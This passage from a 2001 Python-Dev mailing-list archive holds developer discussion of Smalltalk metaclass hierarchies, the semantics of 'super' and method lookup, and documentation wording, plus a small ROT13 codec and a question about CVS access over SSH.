0x0069: 0x0076, 0x006a: 0x0077, 0x006b: 0x0078, 0x006c: 0x0079, 0x006d: 0x007a, 0x006e: 0x0061, 0x006f: 0x0062, 0x0070: 0x0063, 0x0071: 0x0064, 0x0072: 0x0065, 0x0073: 0x0066, 0x0074: 0x0067, 0x0075: 0x0068, 0x0076: 0x0069, 0x0077: 0x006a, 0x0078: 0x006b, 0x0079: 0x006c, 0x007a: 0x006d, }) ### Encoding Map encoding_map = {} for k,v in decoding_map.items(): encoding_map[v] = k ### Filter API def rot13(infile, outfile): outfile.write(infile.read().encode('rot-13')) if __name__ == '__main__': import sys rot13(sys.stdin, sys.stdout) --------------5800C85BDAA2AC1AD23ED42E-- From guido@digicool.com Wed May 2 23:11:07 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 17:11:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200." <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> > [From Jim Althoff] > > In the list below, indentation indicates class hieararchy (superclass -- > > subclass) > The indentation, unfortunately, seems to be destroyed. [...] > A question for Jim (this is more Smalltalk than Python related): > How does the Behaviour class fit into this picture? Jim responded with a much clearer diagram, and as a bonus an answer to your question about Behaviour! > Hi Guido, > > Sorry about the mangled diagram. It's kind of tricky doing this with just > text. :-) Anyway, below is a -- hopefully -- improved diagram and > description. > > At the very bottom is an answer to the question about "Behavior". > > Jim > > ========================================== > > Smalltalk-80 (simplified) class/metaclass structure: > > Terminology: > o A "class" is an object that can be instantiated. > o A "metaclass" is a class and is one such that when _it_ is instantiated > _that_ instance is _itself_ a class (which can be instantiated). > (A metaclass is a specialization of class). > > Essentially, there are two parallel hierarchies: 1) the class hierarchy > and 2) the metaclass hierarchy. The class hierarchy starts with class > Object. The metaclass hierarchy starts right below Class with the > metaclass ObjectMetaClass. > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > > Object is the top of the class hierarchy (and total hierarchy). It has no > superclass. It is the only class that has no superclass. > Class is a subclass of Object. > MetaClass is a subclass of Class. > > ObjectMetaClass is also a subclass of Class. > ClassMetaClass is a subclass of ObjectMetaClass. > MetaClassMetaClass is a subclass of ClassMetaClass. > > Adding in application classes Rectangle and SpamRectangle then might look > like: > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > o RectangleMetaClass > o SpamRectangleMetaClass > o Rectangle > o SpamRectangle > > Rectangle is a subclass of Object. > SpamRectangle is a subclass of Rectangle. > > RectangleMetaClass is a subclass of ObjectMetaClass. > SpamRectangleMetaClass is a subclass of RectangleMetaClass. > > Rectangle is an instance of RectangleMetaClass. > SpamRectangle is an instance of SpamRectangleMetaClass. > (SpamRectangleMetaClass is an instance of MetaClass.) > > The next list shows both the subclass- and the instanceOf- relationships > between classes and metaclasses. > > In this list a class listed below another class is a subclass of it. > SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam -- > the class of which class Spam is an instance). > > Class > Object instanceOf ObjectMC instanceOf MetaClass > Class instanceOf ClassMC instanceOf MetaClass > MetaClass instanceOf MetaClassMC instanceOf MetaClass > > ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances > of MetaClass. > > MetaClass is an instance of MetaClassMetaClass But MetaClassMetaClass is > an instance of MetaClass. So this particular relationship is circular. > (In Smalltalk-76, Class was an instance of itself.) > > Application classes would have a similar, parallel hierarchy between > classes and their associated metaclasses. For example: > > Object instanceOf ObjectMC instanceOf MetaClass > Rectangle instanceOf RectangleMC instanceOf MetaClass > SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass > > When you create class SpamRectangle as a subclass of class Rectangle, the > code in the class-creation method first creates the metaclass > SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of > RectangleMetaClass. The code then creates the SpamRectangle class as an > instance of the SpamRectangleMetaClass metaclass it just created. > > You can then create instances of class SpamRectangle. > > SpamRectangle "instance methods" reside in the method dict of > SpamRectangle. > SpamRectangle "class methods" reside in the method dict of > SpamRectangleMetaClass. > > ============================ > > Regarding Thomas' question: > > The Smalltalk-80 class hierarchy actually has a bit more factoring than > what I show above. In particular, Class and MetaClass are subclasses of > the class ClassDescription. ClassDescription is a subclass of class > Behavior. Behavior is a subclass of Object. > > So it looks like: > > > o Object > o Behavior > o ClassDescription > o MetaClass > o Class > o ObjectMetaClass > o BehaviorMetaClass > o ClassDescriptionMetaClass > o MetaClassMetaClass > o ClassMetaClass > > Class Behavior basically abstracts the creation and handling of method > dict.s. Class ClassDescription factors out common, reusable code between > MetaClass and Class. Clearly there are a number of ways of designing (or > over-designing ) this part of the hierarchy. The key idea, though, > was to use the subclassing mechanism as a way of supportig specialized > class methods. > > ============================= --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Wed May 2 22:24:28 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 2 May 2001 17:24:28 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77 In-Reply-To: Message-ID: [Fred L. Drake] > Update the filter() and list() descriptions to include information > about the support for containers and iteration. > ... > \begin{funcdesc}{list}{sequence} > ! Return a list whose items are the same and in the same order as > ! \var{sequence}'s items. \var{sequence} may be either a sequence, > ! a container that supports iteration, or an iterator object. > ... [and similarly for filter()] Before we repeat this last incantation umpteen more times in the docs, is this how we want it to read in the end? The truth of the implementation and of the design is that "sequence" is any object that supports iteration, period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they raise TypeError). "A sequence" and "an iterator object" *always* support iteration, so naming them too appears to draw a distinction that doesn't exist. Suggested alternative: \var{sequence} must support iteration (see XXX). where XXX is common boilerplate explaining what "support iteration" means, and that sequences and iterator objects are just particular cases of that. Note that this boilerplate may expand to include generators too before 2.2 is real, and a generator isn't really "a container that supports iteration" (the word "container" is a strain in the generator context). That is, a long-winded incantation is just going to get longer over time, and if it's repeated umpteen places in the docs I doubt they'll all get updated when needed. From michel@digicool.com Wed May 2 22:43:42 2001 From: michel@digicool.com (Michel Pelletier) Date: Wed, 2 May 2001 14:43:42 -0700 (PDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> Message-ID: On Wed, 2 May 2001, Guido van Rossum wrote: > > > > o Object > > o Class > > o MetaClass > > o ObjectMetaClass > > o ClassMetaClass > > o MetaClassMetaClass > > > > Object is the top of the class hierarchy (and total hierarchy). It has no > > superclass. It is the only class that has no superclass. > > Class is a subclass of Object. > > MetaClass is a subclass of Class. > > > > ObjectMetaClass is also a subclass of Class. > > ClassMetaClass is a subclass of ObjectMetaClass. > > MetaClassMetaClass is a subclass of ClassMetaClass. Does this go on ad infinitum? ie, is there a ClassMetaClassMetaClass which sublcasses MetaClassMetaClass and so on? I was under the impression from talking to JimF that Smalltalk eventually stopped at a class that is a subclass of itself. -Michel From greg@cosc.canterbury.ac.nz Thu May 3 02:35:29 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 13:35:29 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that DictType.__repr__ could mean either the unbound method for finding the repr of a dictionary, or the bound method for finding the repr of DictType itself. This ambiguity is inherent in the Python language as soon as you try to make classes into instances (which you have to do as a consequence of making types into classes). Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:15:41 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:15:41 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz> Michel Pelletier : > I was under the impression > from talking to JimF that Smalltalk eventually stopped at a class > that is a subclass of itself. Some years ago, while playing with Sun's Postscript-based NeWS window system, I devised an OO language (called P) that got translated into PostScript. It had a very Smalltalk-like class/metaclass system, although rather simpler than what JimF described. As I remember, the kernel consisted of a little knot of about 6 classes with some interesting incestuous relationships between them. If anyone's interested, I could dig out the code and provide details of how it all worked. There might be some ideas that could be used in Python. (Programming in P felt a lot like programming in Python, by the way. If my name had been Guido, who knows where it might have led!) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:25:12 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:25:12 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFF710.9471.8025D7EA@localhost> Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz> Gordon McMillan : > I would like to see ... some discussion of the expected > pragmatic benefits. (That's a different topic from subclassing > types.) Actually, it's not -- the two issues are connected. Suppose we succeed in unifying types and classes. Then instead of classes being of type ClassType, they are now instances of ClassClass. So classes are also instances, or in other words, we have unified classes and instances. So even if we don't go as far as adding Smalltalk-style class-methods-via-metaclasses, we still have to deal with the fact that some things will be both classes and instances. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:27:34 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:27:34 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Guido: > Actually, I think that what's in the __dict__ is just perfect I was thinking of backwards compatibility for people who are hacking the __dict__ of a class directly. If you don't care about that, the problem is simpler. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:39:08 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:39:08 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> Guido: > Will we need to add a "::" operator to Python??? If so, I hope we can find a syntax that doesn't remind one of C++ so much... I have an idea! How about spelling super(self, MyBaseClass) as MyBaseClass[self] This can be thought of as a sort of "cast" which turns self into an object which behaves like it were an instance of MyBaseClass. Then we can write MyBaseClass[self].foo(args) Advantages: * Concise and uncluttered * No new syntax needed * Can be implemented using existing mechanisms * Doesn't even remotely resemble anything in C++ :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From tim.one@home.com Thu May 3 06:49:04 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 3 May 2001 01:49:04 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF01381.592AE31B@lemburg.com> Message-ID: [MAL, on basemethods] > ... > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the bsaemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? Sorry, I'm not sure what either of you is talking about. In class A(B, C): def foo(self): super.foo() Guido said that super would start searching at B, but I don't know what your "continue the search for the method as if it hadn't found the occurrance calling the bsaemethod() API" means: defining what a thing does in terms of an unspecified API it doesn't use is a pretty sure recipe for compounded confusion . Given that we're using Python's search rules, the ambiguous point remaining is whether: super.f() textually contained in a method of class K begins searching with: 1) K.__bases__ or with: 2) self.__class__.__bases__ Java uses #1, and Guido's "the search starts with B" implies that he would too. But it's unclear whether he meant that. Given also class D(A): def foo(self): super.foo() D().foo() both views agree that D.foo() is invoked first, and that D.foo() invokes A.foo() next. But under #1 A.foo() invokes C.foo() or D.foo() next, while under #2 A.foo() invokes A.foo() again. Multiple inheritance is a red herring here -- take C out of A's bases, and the same ambiguity needs to be resolved. From greg@cosc.canterbury.ac.nz Thu May 3 06:56:07 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 17:56:07 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz> Tim: > Java uses #1, and Guido's "the search starts with B" implies that he would > too. But it's unclear whether he meant that. It's the only sane thing for him to mean, as far as I can see. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From pf@artcom-gmbh.de Thu May 3 07:29:03 2001 From: pf@artcom-gmbh.de (Peter Funk) Date: Thu, 3 May 2001 08:29:03 +0200 (MEST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001 3:39: 8 pm" Message-ID: Hi, Greg Ewing: [...] > How about spelling super(self, MyBaseClass) as > > MyBaseClass[self] > > This can be thought of as a sort of "cast" which turns self > into an object which behaves like it were an instance of > MyBaseClass. Then we can write > > MyBaseClass[self].foo(args) > > Advantages: > * Concise and uncluttered > * No new syntax needed > * Can be implemented using existing mechanisms > * Doesn't even remotely resemble anything in C++ :-) Disadvantages: * People will confuse this with calling MyBaseClass.__getitem__(....) * Doesn't even remotely resemble anything in C++ We have to face it: I myself don't like C++ either, but a *lot* of people today are already familar with C++ today. Giving them something they are already familar with, will make it easier to convert some of them to Python. To Greg: This '::' operator is not at all that ugly and AFAI can see would not introduce any backward incompatible change to the language. I'm sure C++ has some other real warts to offer that we both don't want to see in a future version of Python. Right? Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From mal@lemburg.com Thu May 3 08:49:37 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 09:49:37 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> Message-ID: <3AF10D91.802C8555@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I'm not sure I can follow you here: DictType.__repr__ is the > > representation method of the dictionary and not inherited > > from TypeType, so there should be no problem. > > The problem is that DictType.__repr__ could mean either > the unbound method for finding the repr of a dictionary, > or the bound method for finding the repr of DictType > itself. > > This ambiguity is inherent in the Python language as soon > as you try to make classes into instances (which you have > to do as a consequence of making types into classes). We are actually trying to turn classes into types here :-) Really, I think that we could resolve this issue by not inheriting from meta-classes. DictType is a creation of the meta-class TypeType. I'm not calling these instances to prevent additional confusion. The root of the problem is that for some reason there is belief that DictType should implicitly inherit attributes and methods from TypeType. If we simply say that there is no implicit inheritance (only explicit one), then these problems should go away. Some of these ideas are burried in the "super" part of this thread. Unfortunately this concept doesn't go very far since Python has multiple inheritance and thus the term "super" (referring to the class' single base class) is not well-defined. As Jim mentioned in his reply to Thomas' question, SmallTalk has two parallel hierarchies. One for the classes and one for the meta-classes. If we follow the same path in Python and keep the two well separated, I think we can resolve many of the issues which are currently showing up. To link the two hierarchies together we don't need a "super" concept, but instead a way to reach the meta-class in charge of a class, say "klass.__creator__". Note that there's another issue hiding in all this and again this is due to multiple inheritance: which meta-class is in charge of a class which is derived from two classes having different meta-classes ? meta1 --> o klass1 o klass1a o klass1b meta2 --> o klass2 o klass2a o klass2b class klass3(klass1a, klass2b): ... I think there's no clean way to resolve this, so I'd suggest to simply rule this out and declare it illegal (class can only be based on classes having the same meta-class). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry@digicool.com Thu May 3 09:24:16 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 3 May 2001 04:24:16 -0400 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <15089.5552.164307.344721@anthem.wooz.org> >>>>> "M" == M writes: M> Here's a little fun codec to play with. It encodes the input M> using the ROT13 encoding (which is 1-1 and idempotent). LOL! Guess what `language' I chose to use when testing Mailman's i18n support? :) -Barry From fredrik@pythonware.com Thu May 3 09:11:10 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Thu, 3 May 2001 10:11:10 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid> mal wrote: > Here's some sample output (Netscape can unscramble this BTW): heh. just discovered that outlook express can deal with this too -- but only if the message comes from the usenet. on ordinary mail, the "unscramble rot13" menu entry is disabled (too much usability testing?) maybe you could repost your secret message to comp.lang.python ;-) Cheers /F From mal@lemburg.com Thu May 3 10:05:41 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 11:05:41 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid> Message-ID: <3AF11F65.5CBF508C@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Here's some sample output (Netscape can unscramble this BTW): > > heh. just discovered that outlook express can deal with this > too -- but only if the message comes from the usenet. > > on ordinary mail, the "unscramble rot13" menu entry is disabled > (too much usability testing?) > > maybe you could repost your secret message to comp.lang.python ;-) It wasn't all that secret: I simply cut&pasted the first two paragraphs of the message through the codec. There was also an inaccuracy in the posting: the codec still produces Unicode (by virtue of using the charmap codec as basis). Still, it serves as nice example of what str.decode() and str.encode() can be used for and also demonstrates how easy it is to install new codecs. I think I'll repost it to c.l.p though -- with a new secret attached to it ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Thu May 3 15:26:22 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:26:22 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200." <3AF10D91.802C8555@lemburg.com> References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com> > We are actually trying to turn classes into types here :-) Yes! Wait till you see my next batch of checkins. :-) > Really, I think that we could resolve this issue by not inheriting > from meta-classes. DictType is a creation of the meta-class > TypeType. I'm not calling these instances to prevent additional > confusion. The root of the problem is that for some reason there > is belief that DictType should implicitly inherit attributes and > methods from TypeType. If we simply say that there is no implicit > inheritance (only explicit one), then these problems should go > away. Sorry, you still seem to be confused about this. As I tried to explain before, DictType does not *inherit* from TypeType, but it is an *instance* of TypeType. TypeType defines a __repr__() method for all its instances. This is needed so that repr(DictType) returns "". It is *not* inherited from TypeType! If DictType were to inherit from something, it would inherit from the (not yet existing) ObjectType. ObjectType would have a __repr__ method too: it returns "". But this method is overridden by DictType, so doesn't come into play. Requiring explicit inheritance (whatever that may be) won't fix the problem. > Some of these ideas are burried in the "super" part of this > thread. Unfortunately this concept doesn't go very far since > Python has multiple inheritance and thus the term "super" > (referring to the class' single base class) is not well-defined. Not true. While super can't always refer to a single class, the use of super can be completely well-defined in an unambiguous way. Given class D(A, B, C): def foo(self): super.foo(self) "super.foo" is whatever would be called in D1 if we changed the class hierarchy as follows: class D1(A, B, C): pass class D(D1): def foo(self): D1.foo(self) The problem with super is not that it isn't well-defined. Its problem is that it's not enough to do what you want. In some situations involving multiple inheritance, it can be essential to be able to "merge" methods of the sane name defined in each of the base classes, e.g. class C(A, B): def save(self): A.save(self) B.save(self) So we can't use super as an argument to abandon explicitly naming the base class of base methods. Out of the proposed spellings that I can remember: B.save(self) # current Python B.__dict__['save'](self) # ditto, butt ugly B::save(self) # C++ B._.save(self) # Don Beaudry B.instanceMethods.save(self) # ??? I still like current Python best! > As Jim mentioned in his reply to Thomas' question, SmallTalk > has two parallel hierarchies. One for the classes and one for > the meta-classes. If we follow the same path in Python and > keep the two well separated, I think we can resolve many of > the issues which are currently showing up. Yeah, but this is not the path that Python has already taken (and which has been beaten further by Jim Fulton's ExtensionClasses). Python's path is "turtles all the way down". See also my old head-exploding metaclasses paper. > To link the two hierarchies together we don't need a "super" > concept, but instead a way to reach the meta-class in charge > of a class, say "klass.__creator__". Your confusion between the "isInstanceOf" and "isInheritedFrom" relationships seems really deep! Super relates to inheritance. Metaclasses relate to instantiation (of the class, as an instance of the metaclass). > Note that there's another issue hiding in all this and again > this is due to multiple inheritance: which meta-class is in > charge of a class which is derived from two classes having > different meta-classes ? > > meta1 --> o klass1 > o klass1a > o klass1b > meta2 --> o klass2 > o klass2a > o klass2b > > class klass3(klass1a, klass2b): > ... > > I think there's no clean way to resolve this, so I'd suggest > to simply rule this out and declare it illegal (class can > only be based on classes having the same meta-class). Unfortunately, again thanks to Jim Fulton, we can't rule this out, because this is actually used by ExtensionClasses. The rule (as I interpret it) gives the first base class control; if the first base class is a standard class, it looks if any of the other base classes are not standard classes, and if so, gives control to the first such base class. Another way to say this is that the first base class that has a non-standard metaclass gets control. (ExtensionClasses implements an additional rule where it requires all except one of the base classes to define no instance variables. This is an example of the importance of metaclasses done right: the metaclass has control over such issues. I don't think that Smalltalk's metaclasses have this much control -- you pretty much have a 1-1 correspondence between class and metaclass. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 3 15:28:03 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:28:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200." <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com> > Guido: > > > Actually, I think that what's in the __dict__ is just perfect > > I was thinking of backwards compatibility for people who > are hacking the __dict__ of a class directly. Depending on how they hack it, it may still work. > If you don't care about that, the problem is simpler. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Thu May 3 15:26:51 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 3 May 2001 09:26:51 -0500 Subject: [Python-Dev] OT: CVS access through firewall via SSH Message-ID: <15089.27307.136251.862692@beluga.mojam.com> Python-dev folks, Sorry for the off-topic post, but I'm striking out on the various other sources I've located so far. Since this group seemed to have a love-hate relationship with CVS for awhile I thought maybe someone here would be able to steer me in the right direction. I have to access a CVS repository through a firewall via SSH. That is, to get to "server" I have to tunnel through "firewall" using SSH to port "nnn". Using SSH to establish an interactive session to server is no problem: ssh -p nnn firewall When I'm inside the firewall, I use a CVSROOT that looks like :pserver:montanaro@server:/cvs/projects I need to merge the two bits somehow to come up with a CVSROOT that will do the tunnel automagically. I've tried this: :pserver:montanaro@firewall:nnn/cvs/projects but CVS complains cvs [update aborted]: connect to firewall:2401 failed: Connection refused (port 2401 is the normal CVS port). Any suggestions or pointers? Thanks, Skip From mal@lemburg.com Thu May 3 17:08:30 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 18:08:30 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com> Message-ID: <3AF1827E.E730F5DE@lemburg.com> Guido van Rossum wrote: > > > We are actually trying to turn classes into types here :-) > > Yes! Wait till you see my next batch of checkins. :-) Looking forward to them :) BTW, can you give a good starting point into all this (code wise and concept wise) ? I'd like to play around these new concepts a litte to get a beeter feeling for the possible issues (I should have done the same for the coercion stuff a year ago: implementing mxNumber I now find that some important hooks are missing :-(). > > Really, I think that we could resolve this issue by not inheriting > > from meta-classes. DictType is a creation of the meta-class > > TypeType. I'm not calling these instances to prevent additional > > confusion. The root of the problem is that for some reason there > > is belief that DictType should implicitly inherit attributes and > > methods from TypeType. If we simply say that there is no implicit > > inheritance (only explicit one), then these problems should go > > away. > > Sorry, you still seem to be confused about this. I think it has to do with terminology: when I say "inherit" I actually mean "the lookup is forwarded to the another object". In that sense, instances inherit from their classes and classes from their base-classes: meta-class M -> o base-class A o class B o instance x = B() Meta-class M control this "inheritance scheme" and can modify it depending on its needs. Here's a scenario of what I have in mind: In the above picture, say A defines an attribute A.a which is not defined in B or as instance attribute of B(). Querying x.a would then launch this process: 1. x.a -> fails 2. M.__findattr__(x, 'a') is called to find and return the attribute 3. M.__findattr__ asks B for an attribute 'a' -> fails 4. -- " -- asks A -- " -- -> success 5. -- " -- returns the found attribute I know that this is somewhat different under the covers than what's happening now, but the Python programmer will not notice this. It most probably does not work well with the Don Beaudry hook though... so maybe I'm simply on the wrong track here. > As I tried to > explain before, DictType does not *inherit* from TypeType, but it is > an *instance* of TypeType. TypeType defines a __repr__() method for > all its instances. This is needed so that repr(DictType) returns > "". It is *not* inherited from TypeType! > > If DictType were to inherit from something, it would inherit from the > (not yet existing) ObjectType. ObjectType would have a __repr__ > method too: it returns "". > > But this method is overridden by DictType, so doesn't come into play. > > Requiring explicit inheritance (whatever that may be) won't fix the > problem. With "explicit inheritance" I meant that the programmer has to take care of passing the lookup on to the meta-class, rather than applying some magic which hooks together class and meta- class. > > Some of these ideas are burried in the "super" part of this > > thread. Unfortunately this concept doesn't go very far since > > Python has multiple inheritance and thus the term "super" > > (referring to the class' single base class) is not well-defined. > > Not true. While super can't always refer to a single class, the use > of super can be completely well-defined in an unambiguous way. Given > > class D(A, B, C): > def foo(self): > super.foo(self) > > "super.foo" is whatever would be called in D1 if we changed the class > hierarchy as follows: > > class D1(A, B, C): pass > class D(D1): > def foo(self): > D1.foo(self) Nice trick -- much like the "+0" trick in math ;-) > The problem with super is not that it isn't well-defined. Its problem > is that it's not enough to do what you want. In some situations > involving multiple inheritance, it can be essential to be able to > "merge" methods of the sane name defined in each of the base classes, > e.g. > > class C(A, B): > def save(self): > A.save(self) > B.save(self) > > So we can't use super as an argument to abandon explicitly naming the > base class of base methods. Out of the proposed spellings that I can > remember: > > B.save(self) # current Python > B.__dict__['save'](self) # ditto, butt ugly > B::save(self) # C++ > B._.save(self) # Don Beaudry > B.instanceMethods.save(self) # ??? > > I still like current Python best! But it doesn't help us in the very common case of mixin classes since there the method and sometimes even not the programmer will know where the basemethod to call lives. This is why I wrote the basemethod() helper: it looks up the right method at run-time and thus allows writing mixin-classes which override methods of other classes which are only known to the programmer using the mixin and not necessarily to the one writing the mixin. > > As Jim mentioned in his reply to Thomas' question, SmallTalk > > has two parallel hierarchies. One for the classes and one for > > the meta-classes. If we follow the same path in Python and > > keep the two well separated, I think we can resolve many of > > the issues which are currently showing up. > > Yeah, but this is not the path that Python has already taken (and > which has been beaten further by Jim Fulton's ExtensionClasses). > Python's path is "turtles all the way down". See also my old > head-exploding metaclasses paper. I know... I was under the impression, though, that a little breakage under the covers is allowed when moving from type/classes to all types. > > To link the two hierarchies together we don't need a "super" > > concept, but instead a way to reach the meta-class in charge > > of a class, say "klass.__creator__". > > Your confusion between the "isInstanceOf" and "isInheritedFrom" > relationships seems really deep! Super relates to inheritance. > Metaclasses relate to instantiation (of the class, as an instance of > the metaclass). See above... I don't like implicitely binding creation of objects with lookup paths. These two concepts don't belong together, IMHO, since they introduce restrictions which are not really necessary. (I have made some great experience with loosly coupled object systems and don't want to miss their flexibility anymore.) > > Note that there's another issue hiding in all this and again > > this is due to multiple inheritance: which 